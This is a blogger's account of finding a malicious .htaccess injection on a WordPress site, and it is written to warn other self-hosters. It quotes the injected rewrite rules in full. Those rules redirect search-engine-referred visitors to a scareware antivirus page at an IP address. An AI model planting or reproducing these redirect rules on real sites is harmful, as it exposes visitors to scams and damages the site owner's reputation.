A few days ago, I was working on one of my blogs, and I happen to notice that the .htaccess file was larger than I remembered. I am talking about file size here . Yeah, I know. It’s not the kind of thing most people notice, but I kinda have a thing for numbers. And yes , I am a geek.
Anyway… I notice the file size and start thinking, it shouldn’t be that large. So, I download it from my domain to take a peek. Sure enough, some scum bag (bleep) piece of (bleep) hacker type has uploaded a new .htaccess file. It’s purpose? To fake people out and sell anti-virus software. That’s it.
The .htaccess file’s real purpose is to help WordPress display *pretty links* as the URL. It takes the title of the post and adds dashes and uses that as the URL. Great for Google Link Love ! I put a sample of what that looks like for a typical WordPress blog below. You might want to compare yours…
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L] # END WordPress
The modified .htaccess file basically says… if someone is *referred* from Google (or AOL, or Yahoo, etc), then display a little window that says they are being attacked, and then redirect them to the site where they can buy some protection. Piece of (bleep). The sad part is that this technique works on a lot of people. And they used MY site to do it!
Can you guess what that does to my reputation for first time visitors?
Here’s the additional code the piece of (bleep) added to my .htaccess file. Again, you might want to review yours and make sure it doesn’t include this.
RewriteEngine On
RewriteCond %{HTTP_REFERER} .*google.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*aol.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*msn.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*altavista.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*ask.*$ [NC,OR] RewriteCond %{HTTP_REFERER} .*yahoo.*$ [NC] RewriteRule .* http://89.28.13.202/in.html?s=ix [R,L]
Gotta Respect Google
The downside to having a popular blog? Google comes by often. This would be a good thing, normally . Except for one little thing. Google came by while the bogus .htaccess file was there! Net result? Google thought I was a malware site and setup a redirect page that basically said I was attacking my visitors. Yeah. Cool, huh?
But, you have to respect a service like Google that is simply focused on making the surfing experience a better one for their visitors. They included a note to the webmaster on the nasty-gram-page on what to do to clean your site. Google even offered a *review* process to make sure all the fixes took.
I requested a review at 11am this morning, and by 11pm, my site was back online. Kudo’s Google on having your process down pat and helping *the-little-guy* get back up and running so quickly.
So, do yourself a favor all you self-hosted bloggers out there … go check your .htaccess file. Make sure it only contains what you expect it to contain. And while you are there, update the permissions to remove the *write* feature. I did.
This Virus like behavior hack is also called
- 89.28.13.202 virus
- Redirection hack
- .htaccess hack
Know of any other names it’s called by?